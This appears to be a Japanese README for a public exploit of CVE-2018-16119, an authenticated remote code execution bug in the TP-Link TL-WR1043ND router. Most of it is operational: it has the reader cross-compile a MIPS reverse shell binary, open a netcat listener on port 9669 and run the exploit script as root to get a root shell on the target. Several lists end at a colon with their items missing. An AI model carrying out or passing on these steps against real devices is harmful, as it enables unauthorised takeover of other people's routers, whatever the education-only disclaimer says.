
TP-Link TL-WR1043ND - 認証済みリモートコード実行
CVE-2018-16119 は、TP-Link TL-WR1043ND ルータに影響を与える深刻な認証済みリモートコード実行の脆弱性です。この脆弱性により、認証された攻撃者はターゲットデバイス上で root 権限で任意のコマンドを実行できるようになり、システム全体が危険にさらされる可能性があります。
CVE 詳細: CVE-2018-16119
一度悪用されると、攻撃者はルータへのルートシェルアクセスを取得し、以下が可能になります:
# 必要なパッケージをインストール
sudo apt-get update
sudo apt-get install netcat docker.io
このエクスプロイトには MIPS ビッグエンディアン リバースシェルバイナリが必要です。以下の手順でコンパイルします:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Docker コンテナ内で:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Docker を終了し、コンパイルされたバイナリをコピー:
cp /tmp/shh exploit/tftp_server/
ターミナルを開き、ポート9669で netcat リスナーを起動:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
エクスプロイトスクリプトを root 権限で実行 (TFTPサーバに必要):
sudo python3 exploit/exploit.py
スクリプトは以下を実行します:
接続が確立したら:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
この脆弱性は責任を持って開示されており、以下の目的にのみ使用されるべきです:
⚠️ 警告: このエクスプロイトは教育および許可されたテスト目的のみで提供されます。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。ユーザーは、このツールを使用する前に適切な許可を得ていることを確認する責任があります。
Python の依存関係をインストール:
pip3 install -r exploit/requirements.txt
TFTPサーバの権限拒否:
接続失敗:
シェルの応答なし:
id や pwd などの基本コマンドを入力してみてくださいこの研究は、組み込みデバイスファームウェアにおける重大なセキュリティ上の欠陥を示しています。この脆弱性は、以下の重要性を浮き彫りにしています:
研究者: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
この研究は教育目的と組み込みシステムのセキュリティ向上のために実施されました。責任を持ってご使用ください。